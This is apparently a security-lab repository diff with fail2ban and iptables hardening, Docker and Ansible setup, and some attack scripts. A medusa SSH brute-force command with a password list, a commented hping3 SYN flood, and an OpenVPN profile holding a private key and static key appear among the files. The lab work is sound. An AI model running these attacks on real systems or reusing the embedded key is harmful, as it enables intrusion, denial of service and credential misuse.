# an infinite loop constantly feeding itself with non-informative lines
# 2. Increase dbpurgeage defined in fail2ban.conf to e.g. 648000 (7.5 days)
# to maintain entries for failed logins for sufficient amount of time
[recidive]
logpath = /var/log/fail2ban.log
banaction = %(banaction_allports)s
bantime = 1w
findtime = 1d
# Generic filter for PAM. Has to be used with action which bans all
# ports such as iptables-allports, shorewall
[pam-generic]
# pam-generic filter can be customized to monitor specific subset of 'tty's
banaction = %(banaction_allports)s
logpath = %(syslog_authpriv)s
backend = %(syslog_backend)s
[xinetd-fail]
banaction = iptables-multiport-log
logpath = %(syslog_daemon)s
backend = %(syslog_backend)s
maxretry = 2
# stunnel - need to set port for this
[stunnel]
logpath = /var/log/stunnel4/stunnel.log
[ejabberd-auth]
port = 5222
logpath = /var/log/ejabberd/ejabberd.log
[counter-strike]
logpath = /opt/cstrike/logs/L[0-9]*.log
# Firewall: http://www.cstrike-planet.com/faq/6
tcpport = 27030,27031,27032,27033,27034,27035,27036,27037,27038,27039
udpport = 1200,27000,27001,27002,27003,27004,27005,27006,27007,27008,27009,27010,27011,27012,27013,27014,27015
action = %(banaction)s[name=%(__name__)s-tcp, port="%(tcpport)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(udpport)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp]
# consider low maxretry and a long bantime
# nobody except your own Nagios server should ever probe nrpe
[nagios]
logpath = %(syslog_daemon)s ; nrpe.cfg may define a different log_facility
backend = %(syslog_backend)s
maxretry = 1
[oracleims]
# see "oracleims" filter file for configuration requirement for Oracle IMS v6 and above
logpath = /opt/sun/comms/messaging64/log/mail.log_current
banaction = %(banaction_allports)s
[directadmin]
logpath = /var/log/directadmin/login.log
port = 2222
[portsentry]
logpath = /var/lib/portsentry/portsentry.history
maxretry = 1
[pass2allow-ftp]
# this pass2allow example allows FTP traffic after successful HTTP authentication
port = ftp,ftp-data,ftps,ftps-data
# knocking_url variable must be overridden to some secret value in jail.local
knocking_url = /knocking/
filter = apache-pass[knocking_url="%(knocking_url)s"]
# access log of the website with HTTP auth
logpath = %(apache_access_log)s
blocktype = RETURN
returntype = DROP
action = %(action_)s[blocktype=%(blocktype)s, returntype=%(returntype)s]
bantime = 1h
maxretry = 1
findtime = 1
[murmur]
# AKA mumble-server
port = 64738
action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol=tcp, chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol=udp, chain="%(chain)s", actname=%(banaction)s-udp]
logpath = /var/log/mumble-server/mumble-server.log
[screensharingd]
# For Mac OS Screen Sharing Service (VNC)
logpath = /var/log/system.log
logencoding = utf-8
[haproxy-http-auth]
# HAProxy by default doesn't log to file you'll need to set it up to forward
# logs to a syslog server which would then write them to disk.
# See "haproxy-http-auth" filter for a brief cautionary note when setting
# maxretry and findtime.
logpath = /var/log/haproxy.log
[slapd]
port = ldap,ldaps
logpath = /var/log/slapd.log
[domino-smtp]
port = smtp,ssmtp
logpath = /home/domino01/data/IBM_TECHNICAL_SUPPORT/console.log
[phpmyadmin-syslog]
port = http,https
logpath = %(syslog_authpriv)s
backend = %(syslog_backend)s
[zoneminder]
# Zoneminder HTTP/HTTPS web interface auth
# Logs auth failures to apache2 error log
port = http,https
logpath = %(apache_error_log)s

37
docker-compose.yml
View File

@ -0,0 +1,37 @@
version: "2"
services:
registry:
image: registry
ports:
- "5000:5000"
master:
image: localhost:5000/sec
privileged: true
cap_add:
- NET_ADMIN
user: root
entrypoint: ["sec_bootstrap", "role=master", "sec_master_service_name=master", "sec_worker_service_name=worker"]
ports:
- "2222:22"
networks:
- net
volumes:
- /home/zoiros13/swarmlab-sec/test/project:/project
worker:
image: localhost:5000/sec
privileged: true
cap_add:
- NET_ADMIN
user: root
entrypoint: ["sec_bootstrap", "role=worker", "sec_master_service_name=master", "sec_worker_service_name=worker"]
networks:
- net
volumes:
- /home/zoiros13/swarmlab-sec/test/project:/project
networks:
net:

8
get_hosts
View File

@ -0,0 +1,8 @@
#!/bin/sh
# Include the variables that store the Docker service names
# shellcheck disable=SC1091
. /etc/opt/service_names
( netstat -t | grep ESTABLISHED | awk '{print $5}' | grep "$MPI_WORKER_SERVICE_NAME" | cut -d: -f1 \
& getent hosts "$MPI_MASTER_SERVICE_NAME" | cut -d' ' -f1 ) | sort -u

74
install-vim-plugin.sh
View File

@ -0,0 +1,74 @@
#! /usr/bin/env sh
start_dir=$(pwd)
bin_string="export PATH=\"${PATH}:${HOME}/.vimpkg/bin\""
# Download the apt-vim files
curl -fSsLo ${HOME}/apt-vim/apt-vim --create-dirs \
https://raw.githubusercontent.com/egalpin/apt-vim/master/apt-vim
curl -fSsLo ${HOME}/apt-vim/vim_config.json \
https://raw.githubusercontent.com/egalpin/apt-vim/master/vim_config.json
# Add vimrc if there isn't one already
[ -f ${HOME}/.vimrc ] || touch ${HOME}/.vimrc
# Make sure vimrc is using pathogen
if [ $(grep -c "execute pathogen#infect()" ${HOME}/.vimrc) -eq 0 ]; then
echo "execute pathogen#infect()" >> ${HOME}/.vimrc
fi
if [ $(grep -c "call pathogen#helptags()" ${HOME}/.vimrc) -eq 0 ]; then
echo "call pathogen#helptags()" >> ${HOME}/.vimrc
fi
# Update path for executing shell
eval "$bin_string"
added_to_profile=false
already_present=false
for rc in bashrc zshrc bash_profile; do
if [ -s "$HOME/.$rc" ]; then
if grep -q "$bin_string" "$HOME/.$rc"; then
already_present=true
else
printf "\n$bin_string\n" >> "$HOME/.$rc"
printf "== Added apt-vim PATH to '~/.$rc'\n"
added_to_profile=true
fi
fi
done
# Execute apt-vim init
cd ${HOME}/apt-vim
python - <<EOF
import imp, os
print('apt-vim setup starting')
HOME = os.path.expanduser("~")
APT_VIM_DIR = os.path.abspath(os.path.join(HOME, 'apt-vim'))
SCRIPT_ROOT_DIR = os.path.abspath(os.path.join(HOME, '.vimpkg'))
BIN_DIR = os.path.abspath(os.path.join(SCRIPT_ROOT_DIR, 'bin'))
os.environ['PATH'] += os.pathsep + BIN_DIR
os.chdir(APT_VIM_DIR)
aptvim = imp.load_source("aptvim", "./apt-vim")
av = aptvim.aptvim(ASSUME_YES=True, VIM_CONFIG='', INSTALL_TARGET='')
av.first_run()
av.handle_install(None, None, None)
EOF
python_result=$?
cd $start_dir
echo
if [ "$python_result" -ne 0 ]; then
echo "== Error:"
echo " Installation failed."
elif [ "$added_to_profile" = false ] && [ "$already_present" = false ]; then
echo "== Error:"
echo " Found no profile to add apt-vim PATH to."
echo " Add the following line to your shell profile and source it to install manually:"
printf " $bin_string\n"
else
echo "== apt-vim installation succeeded! Run 'source ~/.bashrc || source ~/.bash_profile' or 'source ~/.zshrc'"
echo " to access the executable script."
fi

108
out.log
View File

@ -0,0 +1,108 @@
[
{
"Id": "sha256:0041eaed21a5682cff858aee77ed2ea8c36c35cce0379f98e6a00d0ffef32a7f",
"RepoTags": [
"localhost:5000/sec:latest"
],
"RepoDigests": [
"localhost:5000/sec@sha256:f13d2efea610e1b5e8a4c7340be199975f7d0dc76a232806e908bb2d7851b536"
],
"Parent": "sha256:3c45feb440ff524a3e4f2265d5024e6b9050bea85e9ab2121abdbb06ee174799",
"Comment": "",
"Created": "2021-01-20T20:32:11.522588405Z",
"Container": "ec9a751f11f0c2b16c6c6f2640b1c6bdc9f60731dd9b2a0dc535330513882733",
"ContainerConfig": {
"Hostname": "ec9a751f11f0",
"Domainname": "",
"User": "docker",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"NOTVISIBLE=in users profile"
],
"Cmd": [
"/bin/sh",
"-c",
"#(nop) ",
"USER docker"
],
"Image": "sha256:3c45feb440ff524a3e4f2265d5024e6b9050bea85e9ab2121abdbb06ee174799",
"Volumes": null,
"WorkingDir": "/project",
"Entrypoint": null,
"OnBuild": null,
"Labels": {}
},
"DockerVersion": "20.10.2",
"Author": "",
"Config": {
"Hostname": "",
"Domainname": "",
"User": "docker",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"NOTVISIBLE=in users profile"
],
"Cmd": [
"/bin/bash"
],
"Image": "sha256:3c45feb440ff524a3e4f2265d5024e6b9050bea85e9ab2121abdbb06ee174799",
"Volumes": null,
"WorkingDir": "/project",
"Entrypoint": null,
"OnBuild": null,
"Labels": null
},
"Architecture": "amd64",
"Os": "linux",
"Size": 305502675,
"VirtualSize": 305502675,
"GraphDriver": {
"Data": {
"LowerDir": "/var/lib/docker/overlay2/4f892c1ac39fc2cb2c12671d034ef86c890fb69a25f93111e51cfec60a896bc1/diff:/var/lib/docker/overlay2/0222bce3cfcd94fb28b763949c93d014ef8cb2ce7563059b2a20185028b6c4f3/diff:/var/lib/docker/overlay2/4061c57597e713442d54694880a0db84f21b84dc27a83cf14b1a2ea8f80adb57/diff:/var/lib/docker/overlay2/ad0740f4bddaa797f65b9b610bb997383e100f6b11b6e31abfe97a56d73e02a6/diff:/var/lib/docker/overlay2/9f718fd300ccb6ccb4c4993d1e2c08479975a2680f73137c4c2a00675e34dad8/diff:/var/lib/docker/overlay2/36e34aaf6d9ff64abd4c0ae243a7171a6f36f98ec1d8015fd2e52121c61c9388/diff:/var/lib/docker/overlay2/e453e8ba3d5a70996395e475debf7e263dec58550b0f1ab08040f7cffe38a8ed/diff:/var/lib/docker/overlay2/09cbcb578a8d6eb1608796982a8de961456201784d1c4ed1a883c391793da8c4/diff:/var/lib/docker/overlay2/f1ac5b915d3a2ff4c84e6f2fe508ce65dc00b17857abaca3191d98f61b985d76/diff:/var/lib/docker/overlay2/314db0ab7f769d13ef33021169644fd1775852bf27998457ea00256c75adac79/diff:/var/lib/docker/overlay2/7a9f4160461f58a5e631eb9a1f37bf2e2e4077dd18ece01edda94aefec7d513f/diff:/var/lib/docker/overlay2/c2ba9675d35ea38b3e2030a6328afc1375813586d15456e48700224a197af10e/diff:/var/lib/docker/overlay2/6041b67add52b7f6a9f85856676306c785620be38024f5b526aa2e57c5bb94cb/diff:/var/lib/docker/overlay2/30ead6ae4469b85cb7c638e7ac62e00d67cbe93dfd997224403bcba8d69b7ba6/diff:/var/lib/docker/overlay2/d471ee8da4cfca625a09d36962bf37a3817ef988a3120207170381a3cc2f49ff/diff:/var/lib/docker/overlay2/943b7349849e2f834a9d5ad37740f06517a252b3e6268a0763fc1ee15bf4ba17/diff:/var/lib/docker/overlay2/4bca1529a9b65355dc3508268159aee6e2416896cb335bec235d8c8699984d3e/diff:/var/lib/docker/overlay2/d18ba52d5410e31e13be1d13fa2f879c383fd4605b74b9e7579321d724de2704/diff",
"MergedDir": "/var/lib/docker/overlay2/17569aed539925cda12d1788c2d33a78d657f25922e48c0e4dc1005a83a13d0a/merged",
"UpperDir": "/var/lib/docker/overlay2/17569aed539925cda12d1788c2d33a78d657f25922e48c0e4dc1005a83a13d0a/diff",
"WorkDir": "/var/lib/docker/overlay2/17569aed539925cda12d1788c2d33a78d657f25922e48c0e4dc1005a83a13d0a/work"
},
"Name": "overlay2"
},
"RootFS": {
"Type": "layers",
"Layers": [
"sha256:b43408d5f11b7b2faf048ae4eb25c296536c571fb2f937b4f1c3883386e93d64",
"sha256:23135df75b44a66efa9d8dc1a10051768c27bd95388f436eb9553e0eb17211f6",
"sha256:fe6d8881187d429af3f636c574911690455825998c9f366e985eab646665e711",
"sha256:995775ccb2c94c617a372f5a07fe9e85ce422976342a63faf5f81d4e554d33e8",
"sha256:513860d9d8b4c2b418330f754ee9f2a4ae7d0a08f8cc7e09a59e2d8a1f76082d",
"sha256:05d45691094f911e1b03b522b2413f697990fca5d00d2a36681f8252bac30f70",
"sha256:00e25a02cb66855e8c694a62b7a484ff94c6a7a22ff3b7ad77e46465f772ddda",
"sha256:a7a46ea008ba01f492e17cea196b012005cea47943121f07a7ca93e93fbfbfad",
"sha256:170701127bf7609d55d9839ddcfa21759e2b8ccf6c0a6881992314eb15833969",
"sha256:6ffbdb2e142b68e05e145a71776d68d04b4829c8c6ce1601d27f3ff4be775474",
"sha256:b1f3cd54cc350f0710b04c61fa57a0c4906f3671940021313e6e6064c4072247",
"sha256:13318292ad09178d2082cf8d21a96b412f374964202a340c701db1c1c4064263",
"sha256:e9c7b4c198ead49bd465541674eea08c223b465e3ba2d113bff3450cf59943a2",
"sha256:841f3d71c84f6ec64a8af1d647782a73be2320e79386890e7c9c243aa98d41ba",
"sha256:f9c45f1c0ac098e81dfa7aaaa24ddf5667d0141f6f4150af47e607483fbdd0de",
"sha256:f14dbf3fe313e8c4899fb1a9da6d40befca490aacd3dd61a1a9da519aec27cb6",
"sha256:f9a062359efaf04a7b4f8204fe3a640197c8cb0049584f463a0d78c95dfd6fc3",
"sha256:38af96194c0c78613d6406f1ac89611fca867e8318919469d1e4ef831eb7107c",
"sha256:1dca0d6457411690de65496d90b642cb2ad6eaea65a26c7c9c87f59dea1c14f4"
]
},
"Metadata": {
"LastTagTime": "2021-01-20T22:32:11.567491531+02:00"
}
}
]

5275
passwd_list
View File

File diff suppressed because it is too large

35
project/ansible_cfg_text
View File

@ -0,0 +1,35 @@
# config file for ansible -- https://ansible.com/
# ===============================================
# nearly all parameters can be overridden in ansible-playbook
# or with command line flags. ansible will read ANSIBLE_CONFIG,
# ansible.cfg in the current working directory, .ansible.cfg in
# the home directory or /etc/ansible/ansible.cfg, whichever it
# finds first
[defaults]
host_key_checking = False
# some basic default values...
#inventory = /etc/ansible/hosts
#library = /usr/share/my_modules/
#module_utils = /usr/share/my_module_utils/
#remote_tmp = ~/.ansible/tmp
#local_tmp = ~/.ansible/tmp
#plugin_filters_cfg = /etc/ansible/plugin_filters.yml
#forks = 5
#poll_interval = 15
#sudo_user = root
#ask_sudo_pass = True
#ask_pass = True
#transport = smart
#remote_port = 22
#module_lang = C
#module_set_locale = False
# plays will gather facts by default, which contain information about
# the remote system.
#
# smart - gather by default, but don't regather if already gathered

2
project/ansible_fail2ban.sh
View File

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory.yml test_fail2ban.yml -f 5 --ask-pass --ask-become-pass

2
project/ansible_iptables.sh
View File

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory.yml test_iptables_rules.yml -f 5 --ask-pass --ask-become-pass

2
project/ddos_atck_script.sh
View File

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory_w.yml test3.yml -f 4 --ask-pass --ask-become-pass

28
project/fail2ban_script.sh
View File

@ -0,0 +1,28 @@
#!/bin/sh
sudo apt-get update -y # To get the latest package lists
sudo apt install rsyslog -y #instal auth.log
sudo service rsyslog start #start syslog
#grep "Failed password" /var/log/auth.log #check for login failures
#grep "Failed password" /var/log/auth.log | awk ‘{print $11}’ | uniq -c | sort
sudo cat /var/log/auth.log | grep "Failed password"
#sudo apt install fail2ban -y
sudo service fail2ban enable
sudo service fail2ban start
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo sed -i '244d' /etc/fail2ban/jail.local
sudo sed -i '239 a enabled = true' /etc/fail2ban/jail.local
sudo sed -i '240 a maxretry = 3' /etc/fail2ban/jail.local
sudo sed -i '241 a bantime = 300' /etc/fail2ban/jail.local
sudo sed -i '242 a findtime = 30' /etc/fail2ban/jail.local
sudo sed -i '243 a chain = INPUT' /etc/fail2ban/jail.local
sudo sed -i '244 a port = 22' /etc/fail2ban/jail.local
sudo sed -i '245 a action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]' /etc/fail2ban/jail.local
sudo service fail2ban restart
sudo fail2ban-client status sshd
sudo iptables -L
#end

19
project/first_script.sh
View File

@ -0,0 +1,19 @@
#!/bin/sh
#nmap -n -sn 172.25.0.* -oG - | awk '/Up$/{print $2}'
sudo apt-get update -y # To get the latest package lists
sudo apt install ansible -y
sudo apt install sshpass -y
sudo sed -i "11i host_key_checking = False" /etc/ansible/ansible.cfg
ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass
#sudo tcpdump -i eth0
#now interrupt the process. get its PID:
#pid=$(ps -e | pgrep tcpdump)
#echo $pid
#
#interrupt it:
#sleep 5
#kill -2 $pid

1
project/hello_world.sh
View File

@ -0,0 +1 @@
echo "Hello World"

6
project/inventory.yml
View File

@ -0,0 +1,6 @@
[service]
172.21.0.2
172.21.0.3
172.21.0.4
172.21.0.5
172.21.0.6

5
project/inventory_vpn.yml
View File

@ -0,0 +1,5 @@
[service]
10.80.0.3
10.80.0.4
10.80.0.5
10.80.0.6

5
project/inventory_w.yml
View File

@ -0,0 +1,5 @@
[service]
172.21.0.3
172.21.0.4
172.21.0.5
172.21.0.6

54
project/iptables_rules.sh
View File

@ -0,0 +1,54 @@
#!/bin/sh
### 1: Drop invalid packets
#iptables -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP
### 2: Drop TCP packets that are new and are not SYN ###
#iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
### 3: Drop SYN packets with suspicious MSS value ###
#iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP
### 4: Block packets with bogus TCP flags ###
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
### 5: Block spoofed packets ###
#iptables -t mangle -A PREROUTING -s 224.0.0.0/3 -j DROP
#iptables -t mangle -A PREROUTING -s 169.254.0.0/16 -j DROP
#iptables -t mangle -A PREROUTING -s 172.16.0.0/12 -j DROP
#iptables -t mangle -A PREROUTING -s 192.0.2.0/24 -j DROP
#iptables -t mangle -A PREROUTING -s 192.168.0.0/16 -j DROP
#iptables -t mangle -A PREROUTING -s 10.0.0.0/8 -j DROP
#iptables -t mangle -A PREROUTING -s 0.0.0.0/8 -j DROP
#iptables -t mangle -A PREROUTING -s 240.0.0.0/5 -j DROP
#iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP
### 7: Drop fragments in all chains ###
#iptables -t mangle -A PREROUTING -f -j DROP
### 8: Limit connections per source IP ###
iptables -A INPUT -p tcp -m connlimit --connlimit-above 111 -j REJECT --reject-with tcp-reset
### 9: Limit RST packets ###
iptables -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/s --limit-burst 2 -j ACCEPT
iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP
### 10: Limit new TCP connections per second per source IP ###
iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT
iptables -A INPUT -p tcp -m conntrack --ctstate NEW -j DROP
### 11:SYNPROXY
#iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
#iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
#iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
### SSH brute-force protection ###
#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP

10
project/medusa_script.sh
View File

@ -0,0 +1,10 @@
#!/bin/sh
sudo apt-get update -y # To get the latest package lists
sudo apt install medusa -y
cp /project/passwd_list.txt .
medusa -h 172.21.0.6 -u docker -P ./passwd_list.txt -M ssh -f -v 6

5276
project/passwd_list.txt
View File

File diff suppressed because it is too large

2
project/ping-to-me-vpn.sh
View File

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory_vpn.yml test-ping.yml -f 4 --ask-pass --ask-become-pass

8
project/script_update.sh
View File

@ -0,0 +1,8 @@
#!/bin/sh
sudo apt-get update -y # To get the latest package lists
#sudo apt install hping3 -y
#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.25.0.2

110
project/sec_vpn_1.ovpn
View File

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDeVYe+ZqJVT8yz
U/weebbn8MIZmfyAuN1BCwsxt1PR9Bnr+BYMRnxP2g+ZHcQhEngjBAuBIgBjLqV+
B6qceDz3vVmHjzvNZDzx6laQDKxfjbcTX/RlFqDSAtwzgBRENjsUzcdKq42l/Upu
9wh2CPrVGfB876sYTy76xEP2LYKfmqK1FMOHQRWjjgviY954Beyo2BnUsygxq9rE
UExmDoiyT9xEiexJbD/GIuuRJMxIJbgBK6/eGJRmyUXO5uKt8vLqOktiox34NVSx
8ZC5jkUB0LIxp/E2gALU7D+M4UYfFhjDmZosLN2+LIaXwXplwrcwgBeQsRvwsnX7
J0glL6sPAgMBAAECggEAfTXV2JicW0cxlNx7Y/5Pz5d6+EgMN8HkeLjrePgxsE+0
OXvhjtAzOhUoK6bjyWxJVA73G6Y2aaTfdnaC0tO0IiD0xq8XkrgcynCah01b1gRN
Ug/75uIzd5I8yJQc1b1k0HaDAb5Ta2OWA6ADl9W+zTxqfzHKPUp6vqbBT2aZ5Z93
wwK3lsvqadiR3luvHpPbE9+rbZlckgAaChonm2818ZlMk+bRw8S5HVweDqJ9GQ7V
N80vddLFpkgHWKcwVerl1F28WknArPuzGE8j2DdMKGrjOSPsD6DmTwCcfMkX86yD
ijdZ8V3nE34o3B656PRavaLEMze6lOUYdlIvwaYXIQKBgQDu0oOlVIdPu8bCIab0
SLhGbVBpsGsxvQIPpNtjALi2ZL/7MXcV4M96exMbE1OZR7Px5bvncXmKzfF7DZ0I
ow9+p7sU8OyrjFPYqyIZO/avXDxUPjSwB9hr/YmrT+wruE9wxOiovJoU51d9jSic
0PeXkWzTa9ExviAuFg7zu+AvWwKBgQDuU2o6ytpkdDOFoh/z9oRgyh5Yrob7yYB0
IMl+SlkO3Sx0eTvOCh/ixXZyKxQtO+bXLfstXcMqKXbXQ12ZXK9hEMgQrvxtGmt8
YyEQEB4dpzIDwL0odwGNPgw9v5F+ozp3yJGsfED2YuDvcevO2dypBuKlEfQLg7oO
qWXclVQVXQKBgERTmjJs8qGPOZhFBH0TaRVNJRp3zNNYHgTXx6SVikM0o/B8AHQT
84g5OggfCWXrK8JjVdUrk/hwX0wzYuAbts0ns9CT9UJHTZ3JqGHL1BHrs57uhShv
ti1/RinrHciMXL4It/++pd6hKVjUT/A9oPiONLJwQFOY75//05tL/yHNAoGBAIIT
AuKtvn6fMVOZRelIPb358pAiSUf5FWPMVUzZVTwYmN/FH0/4FKkXbusm+e8qR3Zg
ATwkdZV4ZgVdHiPLA2lt2FPKvbjqd4m/LNdwhI9YpqKHunXwZedp2xKEkOtWOV4R
GPjUJDyVgQEO403VeGrEeETxxInYTl8cM50t32N9AoGAXyodFR2SU2LeH01dmkyo
8rWOBrxle6tbQwvg5/M15lNKSJSPrMj/HwF8TGm9sky7nTf8MG34XoT4HAep0SQt
r9gGOZYVaFOAQjaO5MGoTEqQsgRKQd4/qjnw34A1EtW+max9E/6Q+pRAZmMsTQcw
N64WPlO37tcqFVex8Rf3TL8=
-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----
MIIDVzCCAj+gAwIBAgIQUkSzUMmqqaSl/9+zl26XQjANBgkqhkiG9w0BAQsFADAW
MRQwEgYDVQQDDAtFYXN5LVJTQSBDQTAeFw0yMTAxMjMwNDUxNTlaFw0yNDAxMDgw
NDUxNTlaMBQxEjAQBgNVBAMMCXNlY192cG5fMTCCASIwDQYJKoZIhvcNAQEBBQAD
ggEPADCCAQoCggEBAN5Vh75molVPzLNT/B55tufwwhmZ/IC43UELCzG3U9H0Gev4
FgxGfE/aD5kdxCESeCMEC4EiAGMupX4Hqpx4PPe9WYePO81kPPHqVpAMrF+NtxNf
9GUWoNIC3DOAFEQ2OxTNx0qrjaX9Sm73CHYI+tUZ8HzvqxhPLvrEQ/Ytgp+aorUU
w4dBFaOOC+Jj3ngF7KjYGdSzKDGr2sRQTGYOiLJP3ESJ7ElsP8Yi65EkzEgluAEr
r94YlGbJRc7m4q3y8uo6S2KjHfg1VLHxkLmORQHQsjGn8TaAAtTsP4zhRh8WGMOZ
miws3b4shpfBemXCtzCAF5CxG/CydfsnSCUvqw8CAwEAAaOBojCBnzAJBgNVHRME
AjAAMB0GA1UdDgQWBBSb9gH1T/P27JBhjN0Cpuho915rizBRBgNVHSMESjBIgBQq
XIIQau9BBn3TLBYCAYgU3eSBrqEapBgwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0GC
FFFs/LbCAXkoa6MEwNisGWwg8TH+MBMGA1UdJQQMMAoGCCsGAQUFBwMCMAsGA1Ud
DwQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAQEAVK++P8GkkGngnKMZElSHhTYxKXsk
VIsExPbyJ1Cv7u/bOjlpE3stlha4i5C6q2ftIVdjZwl1eWH64Z77tSduVeEakHka
raoUD7ZhnuYAQ2vv7byFFHyQ/ADvrXX/0wrUGTwBhOXwyjl0voBv67tQ4okcsc9C
c20gPRwwian/0tj3C8agFtKzQ7RpyGkSZq1D6wQmmPgGUeSqMN2elHQQ5KVtlSll
ruGkWDWaI9330GYzbxIe3rTv8FhEElR3Tno6KsY4RpvZ4BvUktdFBoo+DGIom04B
WgGDwNszLVOTg0kkv61MUTZxGkgkOK3sF1Ggq6outeVI6iTl9k91z/3/CA==
-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----
MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL
BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw
MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm
43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH
NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX
4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX
/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk
Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd
BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv
QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2
wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq
hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT
f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/
+evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN
hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H
tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg
J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw==
-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>

110
project/sec_vpn_2.ovpn
View File

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
